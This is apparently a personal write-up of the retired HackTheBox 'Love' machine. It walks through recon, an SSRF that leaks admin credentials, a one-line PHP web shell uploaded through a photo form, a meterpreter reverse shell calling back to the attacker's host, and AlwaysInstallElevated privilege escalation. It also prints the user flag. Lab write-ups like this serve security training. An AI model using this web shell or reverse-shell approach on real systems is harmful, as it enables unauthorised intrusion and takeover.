HackTheBox: Love Machine Solution
Haven’t done any HackTheBox in a while so I decided to jump back into it with an easy machine. Hope to have a medium solution posted in the near future. Love recently retired so let’s get into it :)
0x00 Recon
Starting off with some basic recon, we have a few open ports to look at:
Nmap scan report for 10.10.10.239
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| JavaRMI:
|_ Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after: 2024-04-10T14:39:19
| MD5: d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-07-31T21:10:28+00:00; +23m35s from scanner time.
| tls-alpn:
|_ http/1.1
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
The nmap scan revealed some domains to us, let’s add those to our /etc/hosts file so they’ll resolve:
- www.love.htb
- staging.love.htb
Wfuzz also revealed an /admin endpoint on the root domain:
Target: http://love.htb/FUZZ
Total requests: 4697
===================================================================
ID Response Lines Word Chars Payload
===================================================================
...SNIP...
000000511: 301 9 L 30 W 337 Ch "admin"
000002181: 200 125 L 324 W 4388 Ch "index.php"
000001696: 503 11 L 44 W 402 Ch "examples"
Furthermore, we have 3 separate web services running on this box:
- Admin panel on root domain
- File scanner on
stagingsubdomain - Unknown resource we cannot access on port 5000 (??)
Accessing the root domain we’re greeted with a login panel of which we dont have the creds to just yet.
After trying some basic SQLi auth bypass tricks on the root domain, I determined that wasnt quite the path forward and decided to check out the other staging subdomain.
This particular service was kind enough to provide us some functionality without needing any creds :). After exploring the /beta endpoint, the first thing that comes to mind is SSRF. Typically anytime a service will scan an external web resource on your behalf, SSRF is a risk and should be checked for.
I spent far too much time giving this thing URLs before remembering it’s common to bind to ALL interfaces 😉. Remember to keep things simple! Supplying http://localhost:5000/ vs http://10.10.10.239:5000/ gives far different results, and we end up retrieving some creds! admin:@LoveIsInTheAir!!!!
0x01 Admin Panel Access
The creds found above work on the admin panel located at http://love.htb/admin.
Admin of the voting system appears to be “Neovic Devierte”. Attempting to access the “print” functionality gives us a full path disclosure:
Warning: “continue” targeting switch is equivalent to “break”. Did you mean to use “continue 2”? in C:\xampp\htdocs\omrs\tcpdf\tcpdf.php on line 17778 TCPDF ERROR: Some data has already been output, can’t send PDF file
Knowing we have the SSRF from earlier, I decide to check out what’s in the tcpdf.php file. Nothing useful…Kept exploring around admin dashboard, which led to discovering the photo upload functionality. Easily uploaded custom php shell to: images/shell.php
Shell Src
<? $x = system($_GET['x']);>
0x02 Foothold
Our basic php shell lets us execute system commands, lets find out who we are!
GET /images/shell.php?x=whoami HTTP/1.1
Host: www.love.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://www.love.htb/admin/voters.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=hfi9rkokgavfkglrb7doti96ef
Connection: close
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 21:50:11 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8
love\phoebe
I decided I hated executing commands via HTTP so I threw a quick meterpreter payload (abusing the same upload functionality) and spawned a real reverse shell
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows LOVE\Phoebe @ LOVE 10.10.14.7:4444 -> 10.10.10.239:54399 (10.10.10.239)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
0x03 Flags
User
Grabbing user was as simple as reading the Desktop for user.txt
Flag spoiler!
user.txt : 44412c39d7d79abf83eff963d7500e83Root
Uploading the WinPEAS enum script (think LinEnum for Windows) and running it on the target revealed some interesting things. The one that stood out the most, and something I was unaware of when it comes to Windows exploitation; is the AlwaysInstallElevated registry key:
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
Metasploit makes quick work of this configuration oversight:
use exploit/windows/local/always_install_elevated.
Pass it the unpriv meterpreter session and viola!